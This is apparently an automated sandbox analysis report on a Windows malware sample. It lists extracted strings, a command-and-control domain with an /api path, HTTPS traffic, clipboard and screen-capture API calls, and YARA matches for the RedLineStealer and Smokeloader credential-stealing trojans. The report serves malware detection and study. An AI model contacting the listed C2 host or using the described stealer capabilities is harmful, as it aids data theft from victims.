Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro0
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.0000000000713000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cloudewahsj.shop/
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/C
            Source: rdFy6abQ61.exe, 00000000.00000003.1698844311.0000000002E3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/api
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apiP
            Source: rdFy6abQ61.exe, 00000000.00000003.1699010586.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apie
            Source: rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apil
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00437A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00437A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00437C10

            System Summary

            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043D0D00_2_0043D0D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040D1720_2_0040D172
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00408A600_2_00408A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004223700_2_00422370
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00421B300_2_00421B30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00418BA20_2_00418BA2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004378500_2_00437850
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041906A0_2_0041906A
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004260100_2_00426010
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438E00_2_004438E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004180F00_2_004180F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438F90_2_004438F9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438FB0_2_004438FB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004278850_2_00427885
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D8B00_2_0041D8B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004069500_2_00406950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004449500_2_00444950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040E16E0_2_0040E16E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043210B0_2_0043210B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004039100_2_00403910
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004299170_2_00429917
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004061200_2_00406120
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040B92C0_2_0040B92C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F1C10_2_0042F1C1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004239EB0_2_004239EB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004211800_2_00421180
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041618C0_2_0041618C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043099F0_2_0043099F
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041F9A00_2_0041F9A0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D1B00_2_0041D1B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042E9B00_2_0042E9B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041BA520_2_0041BA52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043025E0_2_0043025E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042621B0_2_0042621B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042BA200_2_0042BA20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004172220_2_00417222
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443A300_2_00443A30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004042C00_2_004042C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443AC00_2_00443AC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004302CD0_2_004302CD
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040F2D00_2_0040F2D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004442E00_2_004442E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040B2800_2_0040B280
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004352B00_2_004352B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00402B400_2_00402B40
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443B600_2_00443B60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00409B700_2_00409B70
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00429B7B0_2_00429B7B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042FB7D0_2_0042FB7D
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00405B000_2_00405B00
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00440B000_2_00440B00
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00428B100_2_00428B10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00419B300_2_00419B30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00411BDE0_2_00411BDE
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004123EC0_2_004123EC
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00428C620_2_00428C62
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043C4600_2_0043C460
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043B4100_2_0043B410
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00441C260_2_00441C26
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00444C200_2_00444C20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004064C00_2_004064C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F4E10_2_0042F4E1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004324EE0_2_004324EE
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D4A00_2_0041D4A0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00408D100_2_00408D10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043E5200_2_0043E520
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00442DCA0_2_00442DCA
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00415DD80_2_00415DD8
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00425DA00_2_00425DA0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004085B00_2_004085B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004096600_2_00409660
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00404E200_2_00404E20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043C6C00_2_0043C6C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043E6E00_2_0043E6E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004186E50_2_004186E5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004446800_2_00444680
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041DE900_2_0041DE90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043CE900_2_0043CE90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004287500_2_00428750
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043DF600_2_0043DF60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00429F7C0_2_00429F7C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004337070_2_00433707
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00402F100_2_00402F10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004257130_2_00425713
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F7160_2_0042F716
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004077300_2_00407730
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00427FC00_2_00427FC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004437D00_2_004437D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00433FDF0_2_00433FDF
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004127E00_2_004127E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042A7F00_2_0042A7F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00434FF00_2_00434FF0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042AF920_2_0042AF92
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210AA570_2_0210AA57
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F2A470_2_020F2A47
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02107B020_2_02107B02
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FDB170_2_020FDB17
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211D3370_2_0211D337
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F83570_2_020F8357
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E3B770_2_020E3B77
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02124BB70_2_02124BB7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E6BB70_2_020E6BB7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020ED3D90_2_020ED3D9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EE3D50_2_020EE3D5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021013E70_2_021013E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E88170_2_020E8817
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F603F0_2_020F603F
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E98C70_2_020E98C7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021248E70_2_021248E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FE0F70_2_020FE0F7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211C9270_2_0211C927
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F79500_2_020F7950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E79970_2_020E7997
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021089B70_2_021089B7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211E1C70_2_0211E1C7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F1E450_2_020F1E45
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F26530_2_020F2653
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02124E870_2_02124E87
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FD7070_2_020FD707
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E67270_2_020E6727
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E8F770_2_020E8F77
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211E7870_2_0211E787
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210EC170_2_0210EC17
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FFC070_2_020FFC07
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FD4170_2_020FD417
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02103C520_2_02103C52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210BC870_2_0210BC87
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210AC890_2_0210AC89
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FBCB90_2_020FBCB9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E8CC70_2_020E8CC7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EB4E70_2_020EB4E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021155170_2_02115517
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E45270_2_020E4527
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EF5370_2_020EF537
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021245470_2_02124547
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E5D670_2_020E5D67
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02120D670_2_02120D67
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02101D970_2_02101D97
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E2DA70_2_020E2DA7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021025D70_2_021025D7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F7DFA0_2_020F7DFA
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 00408280 appears 47 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 020E84E7 appears 65 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 00414C20 appears 145 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 020F4E87 appears 70 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
            Source: rdFy6abQ61.exe, 00000000.00000003.1661944358.00000000006B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exe, 00000000.00000000.1654142175.000000000044E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exeBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: rdFy6abQ61.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E07A6 CreateToolhelp32Snapshot,Module32First,0_2_005E07A6
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_0043D0D0
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3916
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d65c73f1-2594-4da1-9550-dde500f36ea8Jump to behavior
